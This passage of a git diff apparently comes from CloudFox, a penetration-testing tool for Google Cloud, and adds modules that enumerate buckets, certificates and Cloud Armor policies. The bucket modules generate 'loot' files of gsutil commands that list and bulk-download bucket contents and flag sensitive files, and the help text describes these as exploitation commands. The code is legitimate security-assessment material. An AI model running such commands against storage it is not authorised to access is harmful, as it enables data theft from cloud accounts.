gcpinternal.NewBaseGCPModule(cmdCtx), + SensitiveFiles: []bucketenumservice.SensitiveFileInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (max %d objects per bucket)...", bucketEnumMaxObjects), globals.GCP_BUCKETENUM_MODULE_NAME) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETENUM_MODULE_NAME, m.processProject) + + if len(m.SensitiveFiles) == 0 { + logger.InfoM("No sensitive files found", globals.GCP_BUCKETENUM_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, file := range m.SensitiveFiles { + switch file.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potentially sensitive file(s) (%d CRITICAL, %d HIGH)", + len(m.SensitiveFiles), criticalCount, highCount), globals.GCP_BUCKETENUM_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning buckets in project: %s", projectID), globals.GCP_BUCKETENUM_MODULE_NAME) + } + + svc := bucketenumservice.New() + + // Get list of buckets + buckets, err := svc.GetBucketsList(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) + return + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_BUCKETENUM_MODULE_NAME) + } + + // Scan each bucket + for _, bucketName := range buckets { + files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, bucketEnumMaxObjects) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + fmt.Sprintf("Could not scan bucket %s in project %s", bucketName, projectID)) + continue + } + + m.mu.Lock() + m.SensitiveFiles = append(m.SensitiveFiles, files...) + for _, file := range files { + m.addFileToLoot(file) + } + m.mu.Unlock() + } +} + +func (m *BucketEnumModule) initializeLootFiles() { + m.LootMap["bucket-enum-sensitive-commands"] = &internal.LootFile{ + Name: "bucket-enum-sensitive-commands", + Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["bucket-enum-commands"] = &internal.LootFile{ + Name: "bucket-enum-commands", + Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *BucketEnumModule) addFileToLoot(file bucketenumservice.SensitiveFileInfo) { + // All files go to the general commands file + m.LootMap["bucket-enum-commands"].Contents += fmt.Sprintf( + "# [%s] %s - gs://%s/%s\n"+ + "# Category: %s, Size: %d bytes\n"+ + "%s\n\n", + file.RiskLevel, file.Category, + file.BucketName, file.ObjectName, + file.Description, file.Size, + file.DownloadCmd, + ) + + // CRITICAL and HIGH risk files also go to the sensitive commands file + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + m.LootMap["bucket-enum-sensitive-commands"].Contents += fmt.Sprintf( + "# [%s] %s - gs://%s/%s\n"+ + "# Category: %s, Size: %d bytes\n"+ + "%s\n\n", + file.RiskLevel, file.Category, + file.BucketName, file.ObjectName, + file.Description, file.Size, + file.DownloadCmd, + ) + } +} + +func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + // All files table + header := []string{ + "Project ID", + "Project Name", + "Bucket", + "Object Name", + "Category", + "Size", + "Public", + "Description", + } + + var body [][]string + for _, file := range m.SensitiveFiles { + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" + } + + body = append(body, []string{ + file.ProjectID, + m.GetProjectName(file.ProjectID), + file.BucketName, + file.ObjectName, + file.Category, + formatFileSize(file.Size), + publicStatus, + file.Description, + }) + } + + // Critical/High risk files table (sensitive files) + sensitiveHeader := []string{ + "Project ID", + "Project Name", + "Bucket", + "Object Name", + "Category", + "Size", + "Public", + } + + var sensitiveBody [][]string + for _, file := range m.SensitiveFiles { + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" + } + + sensitiveBody = append(sensitiveBody, []string{ + file.ProjectID, + m.GetProjectName(file.ProjectID), + file.BucketName, + file.ObjectName, + file.Category, + formatFileSize(file.Size), + publicStatus, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "bucket-enum", + Header: header, + Body: body, + }, + } + + if len(sensitiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bucket-enum-sensitive", + Header: sensitiveHeader, + Body: sensitiveBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_BUCKETENUM_MODULE_NAME) + } + + output := BucketEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETENUM_MODULE_NAME) + } +} + +func formatFileSize(bytes int64) string { + const ( + KB = 1024 + MB = KB * 1024 + GB = MB * 1024 + ) + + switch { + case bytes >= GB: + return fmt.Sprintf("%.1f GB", float64(bytes)/GB) + case bytes >= MB: + return fmt.Sprintf("%.1f MB", float64(bytes)/MB) + case bytes >= KB: + return fmt.Sprintf("%.1f KB", float64(bytes)/KB) + default: + return fmt.Sprintf("%d B", bytes) + } +} diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index a0a5944c..46dbd055 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -1,9 +1,13 @@ package commands import ( + "context" "fmt" + "strings" + "sync" CloudStorageService "github.com/BishopFox/cloudfox/gcp/services/cloudStorageService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" @@ -11,105 +15,334 @@ import ( var GCPBucketsCommand = &cobra.Command{ Use: globals.GCP_BUCKETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP buckets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available bucket information: -cloudfox gcp buckets`, + Aliases: []string{"storage", "gcs"}, + Short: "Enumerate GCP Cloud Storage buckets with security configuration", + Long: `Enumerate GCP Cloud Storage buckets across projects with security-relevant details. + +Features: +- Lists all buckets accessible to the authenticated user +- Shows security configuration (public access prevention, uniform access, versioning) +- Enumerates IAM policies and identifies public buckets +- Shows encryption type (Google-managed vs CMEK) +- Shows retention and soft delete policies +- Generates gcloud commands for further enumeration +- Generates exploitation commands for data access + +Security Columns: +- Public: Whether the bucket has allUsers or allAuthenticatedUsers access +- PublicAccessPrevention: "enforced" prevents public access at org/project level +- UniformAccess: true means IAM-only (no ACLs), recommended for security +- Versioning: Object versioning enabled (helps with recovery/compliance) +- Logging: Access logging enabled (audit trail) +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Retention: Data retention policy (compliance/immutability)`, Run: runGCPBucketsCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BucketsModule struct { + gcpinternal.BaseGCPModule -// Results struct that implements the internal.OutputInterface -type GCPBucketsResults struct { - Data []CloudStorageService.BucketInfo + // Module-specific fields + Buckets []CloudStorageService.BucketInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPBucketsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BucketsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - header := []string{ - "Name", - "Location", - "ProjectID", +func (o BucketsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BucketsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBucketsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETS_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string + // Create module instance + module := &BucketsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Buckets: []CloudStorageService.BucketInfo{}, + LootMap: make(map[string]*internal.LootFile), + } - for _, value := range g.Data { - body = append( - body, - []string{ - value.Name, - value.Location, - value.ProjectID, - }, - ) + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) + + // Check results + if len(m.Buckets) == 0 { + logger.InfoM("No buckets found", globals.GCP_BUCKETS_MODULE_NAME) + return } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_BUCKETS_MODULE_NAME, + // Count public buckets for summary + publicCount := 0 + for _, bucket := range m.Buckets { + if bucket.IsPublic { + publicCount++ + } } - tableFiles = append(tableFiles, tableFile) - return tableFiles + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s), %d PUBLIC", len(m.Buckets), publicCount), globals.GCP_BUCKETS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s)", len(m.Buckets)), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) } -// Decide what is loot based on resource information -func (g GCPBucketsResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BucketsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating buckets in project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Create service and fetch buckets + cs := CloudStorageService.New() + buckets, err := cs.Buckets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETS_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) + return + } + + // Thread-safe append + m.mu.Lock() + m.Buckets = append(m.Buckets, buckets...) + + // Generate loot for each bucket + for _, bucket := range buckets { + m.addBucketToLoot(bucket) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_BUCKETS_MODULE_NAME) + } } -// Houses high-level logic that retrieves resources and writes to output -func runGCPBucketsCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BUCKETS_MODULE_NAME) +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BucketsModule) initializeLootFiles() { + m.LootMap["buckets-commands"] = &internal.LootFile{ + Name: "buckets-commands", + Contents: "# GCP Cloud Storage Bucket Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } +} - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BUCKETS_MODULE_NAME) +func (m *BucketsModule) addBucketToLoot(bucket CloudStorageService.BucketInfo) { + // All commands for this bucket + m.LootMap["buckets-commands"].Contents += fmt.Sprintf( + "## Bucket: gs://%s (Project: %s, Location: %s)\n"+ + "# Describe bucket:\n"+ + "gcloud storage buckets describe gs://%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud storage buckets get-iam-policy gs://%s --project=%s\n"+ + "# List objects:\n"+ + "gsutil ls gs://%s/\n"+ + "gsutil ls -L gs://%s/\n"+ + "# List all objects recursively:\n"+ + "gsutil ls -r gs://%s/**\n"+ + "# Get bucket size:\n"+ + "gsutil du -s gs://%s/\n"+ + "# Download all contents:\n"+ + "gsutil -m cp -r gs://%s/ ./loot/%s/\n"+ + "# Check for public access:\n"+ + "curl -s https://storage.googleapis.com/%s/ | head -20\n\n", + bucket.Name, bucket.ProjectID, bucket.Location, + bucket.Name, bucket.ProjectID, + bucket.Name, bucket.ProjectID, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, bucket.Name, + bucket.Name, + ) +} + +// ------------------------------ +// Helper functions +// ------------------------------ +func boolToYesNo(b bool) string { + if b { + return "Yes" } + return "No" +} - // Get the bucket info using the projectIDs and CloudStorageService - cs := CloudStorageService.New() - var results []CloudStorageService.BucketInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - result, err := cs.Buckets(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return +// getMemberType extracts the member type from a GCP IAM member string +func getMemberType(member string) string { + switch { + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + default: + return "Unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Combined table with IAM columns (one row per IAM member) + header := []string{ + "Project ID", + "Project Name", + "Name", + "Location", + "Public", + "Versioning", + "Uniform Access", + "Encryption", + "Role", + "Member Type", + "Member", + } + + var body [][]string + publicCount := 0 + for _, bucket := range m.Buckets { + // Format public access + publicDisplay := "" + if bucket.IsPublic { + publicDisplay = bucket.PublicAccess + publicCount++ } - results = append(results, result...) - logger.InfoM(fmt.Sprintf("Done retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - cloudfoxOutput := GCPBucketsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BUCKETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return + + // One row per IAM member + if len(bucket.IAMBindings) > 0 { + for _, binding := range bucket.IAMBindings { + for _, member := range binding.Members { + memberType := getMemberType(member) + body = append(body, []string{ + bucket.ProjectID, + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + boolToYesNo(bucket.VersioningEnabled), + boolToYesNo(bucket.UniformBucketLevelAccess), + bucket.EncryptionType, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Bucket with no IAM bindings + body = append(body, []string{ + bucket.ProjectID, + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + boolToYesNo(bucket.VersioningEnabled), + boolToYesNo(bucket.UniformBucketLevelAccess), + bucket.EncryptionType, + "-", + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_BUCKETS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible bucket(s)!", publicCount), globals.GCP_BUCKETS_MODULE_NAME) + } + + output := BucketsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Build scope names from project names map + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames (display names) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETS_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go new file mode 100644 index 00000000..51e25291 --- /dev/null +++ b/gcp/commands/certmanager.go @@ -0,0 +1,389 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + certmanagerservice "github.com/BishopFox/cloudfox/gcp/services/certManagerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCertManagerCommand = &cobra.Command{ + Use: globals.GCP_CERTMANAGER_MODULE_NAME, + Aliases: []string{"certs", "certificates", "ssl"}, + Short: "Enumerate SSL/TLS certificates and find expiring or misconfigured certs", + Long: `Enumerate SSL/TLS certificates from Certificate Manager and Compute Engine. + +This module finds all certificates and identifies security issues: +- Expired or soon-to-expire certificates +- Failed certificate issuance +- Wildcard certificates (higher impact if compromised) +- Self-managed certificates that need manual renewal + +Security Relevance: +- Expired certificates cause outages and security warnings +- Wildcard certificates can be abused to MITM any subdomain +- Certificate domains reveal infrastructure and services +- Self-managed certs may have exposed private keys + +What this module finds: +- Certificate Manager certificates (global) +- Compute Engine SSL certificates (classic) +- Certificate maps +- Expiration status +- Associated domains`, + Run: runGCPCertManagerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CertManagerModule struct { + gcpinternal.BaseGCPModule + + Certificates []certmanagerservice.Certificate + SSLCertificates []certmanagerservice.SSLCertificate + CertMaps []certmanagerservice.CertificateMap + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CertManagerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CertManagerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CertManagerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCertManagerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CERTMANAGER_MODULE_NAME) + if err != nil { + return + } + + module := &CertManagerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Certificates: []certmanagerservice.Certificate{}, + SSLCertificates: []certmanagerservice.SSLCertificate{}, + CertMaps: []certmanagerservice.CertificateMap{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CertManagerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CERTMANAGER_MODULE_NAME, m.processProject) + + totalCerts := len(m.Certificates) + len(m.SSLCertificates) + + if totalCerts == 0 { + logger.InfoM("No certificates found", globals.GCP_CERTMANAGER_MODULE_NAME) + return + } + + // Count expiring/expired certs + expiringCount := 0 + expiredCount := 0 + + for _, cert := range m.Certificates { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + for _, cert := range m.SSLCertificates { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d certificate(s), %d map(s)", + totalCerts, len(m.CertMaps)), globals.GCP_CERTMANAGER_MODULE_NAME) + + if expiredCount > 0 { + logger.InfoM(fmt.Sprintf("[HIGH] %d certificate(s) have EXPIRED!", expiredCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + if expiringCount > 0 { + logger.InfoM(fmt.Sprintf("[MEDIUM] %d certificate(s) expire within 30 days", expiringCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CertManagerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking certificates in project: %s", projectID), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + svc := certmanagerservice.New() + + // Get Certificate Manager certs + certs, err := svc.GetCertificates(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificates in project %s", projectID)) + } + + // Get classic SSL certs + sslCerts, err := svc.GetSSLCertificates(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate SSL certificates in project %s", projectID)) + } + + // Get certificate maps + certMaps, err := svc.GetCertificateMaps(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificate maps in project %s", projectID)) + } + + m.mu.Lock() + m.Certificates = append(m.Certificates, certs...) + m.SSLCertificates = append(m.SSLCertificates, sslCerts...) + m.CertMaps = append(m.CertMaps, certMaps...) + + for _, cert := range certs { + m.addCertToLoot(cert) + } + for _, cert := range sslCerts { + m.addSSLCertToLoot(cert) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CertManagerModule) initializeLootFiles() { + m.LootMap["certmanager-details"] = &internal.LootFile{ + Name: "certmanager-details", + Contents: "# Certificate Manager Details\n# Generated by CloudFox\n\n", + } +} + +func (m *CertManagerModule) addCertToLoot(cert certmanagerservice.Certificate) { + // Build flags for special attributes + var flags []string + if cert.Wildcard { + flags = append(flags, "WILDCARD") + } + if cert.Expired { + flags = append(flags, "EXPIRED") + } else if cert.DaysUntilExpiry <= 30 { + flags = append(flags, "EXPIRING") + } + if cert.SelfManaged { + flags = append(flags, "SELF-MANAGED") + } + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" + } + + m.LootMap["certmanager-details"].Contents += fmt.Sprintf( + "# %s%s\n"+ + "Project: %s | Location: %s\n"+ + "Type: %s | State: %s\n"+ + "Domains: %s\n"+ + "Expires: %s (%d days)\n\n", + cert.Name, flagStr, + cert.ProjectID, cert.Location, + cert.Type, cert.State, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, cert.DaysUntilExpiry, + ) +} + +func (m *CertManagerModule) addSSLCertToLoot(cert certmanagerservice.SSLCertificate) { + // Build flags for special attributes + var flags []string + if cert.Wildcard { + flags = append(flags, "WILDCARD") + } + if cert.Expired { + flags = append(flags, "EXPIRED") + } else if cert.DaysUntilExpiry <= 30 { + flags = append(flags, "EXPIRING") + } + if cert.SelfManaged { + flags = append(flags, "SELF-MANAGED") + } + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" + } + + m.LootMap["certmanager-details"].Contents += fmt.Sprintf( + "# %s (SSL Certificate)%s\n"+ + "Project: %s | Type: %s\n"+ + "Domains: %s\n"+ + "Expires: %s (%d days)\n\n", + cert.Name, flagStr, + cert.ProjectID, cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, cert.DaysUntilExpiry, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Combined certificates table + header := []string{"Project Name", "Project ID", "Name", "Type", "Domains", "Expires", "Days Left", "Wildcard", "Expired", "Self-Managed"} + var body [][]string + + for _, cert := range m.Certificates { + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" + } + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" + } + + body = append(body, []string{ + m.GetProjectName(cert.ProjectID), + cert.ProjectID, + cert.Name, + cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, + fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, + }) + } + + for _, cert := range m.SSLCertificates { + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" + } + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" + } + + body = append(body, []string{ + m.GetProjectName(cert.ProjectID), + cert.ProjectID, + cert.Name, + cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, + fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, + }) + } + + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "certificates", + Header: header, + Body: body, + }) + } + + // Certificate maps table + if len(m.CertMaps) > 0 { + mapHeader := []string{"Project Name", "Project ID", "Name", "Location", "Entries", "Certificates"} + var mapBody [][]string + + for _, certMap := range m.CertMaps { + mapBody = append(mapBody, []string{ + m.GetProjectName(certMap.ProjectID), + certMap.ProjectID, + certMap.Name, + certMap.Location, + fmt.Sprintf("%d", certMap.EntryCount), + strings.Join(certMap.Certificates, ", "), + }) + } + + tables = append(tables, internal.TableFile{ + Name: "certificate-maps", + Header: mapHeader, + Body: mapBody, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := CertManagerOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CERTMANAGER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go new file mode 100644 index 00000000..455fd202 --- /dev/null +++ b/gcp/commands/cloudarmor.go @@ -0,0 +1,353 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudarmorservice "github.com/BishopFox/cloudfox/gcp/services/cloudArmorService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudArmorCommand = &cobra.Command{ + Use: globals.GCP_CLOUDARMOR_MODULE_NAME, + Aliases: []string{"armor", "waf", "security-policies"}, + Short: "Enumerate Cloud Armor security policies and find weaknesses", + Long: `Enumerate Cloud Armor security policies and identify misconfigurations. + +Cloud Armor provides DDoS protection and WAF (Web Application Firewall) capabilities +for Google Cloud load balancers. + +Security Relevance: +- Misconfigured policies may not actually block attacks +- Preview-only rules don't block, just log +- Missing OWASP rules leave apps vulnerable to common attacks +- Unprotected load balancers have no WAF protection + +What this module finds: +- All Cloud Armor security policies +- Policy weaknesses and misconfigurations +- Rules in preview mode (not blocking) +- Load balancers without Cloud Armor protection +- Missing adaptive protection (DDoS)`, + Run: runGCPCloudArmorCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudArmorModule struct { + gcpinternal.BaseGCPModule + + Policies []cloudarmorservice.SecurityPolicy + UnprotectedLBs map[string][]string // projectID -> LB names + LootMap 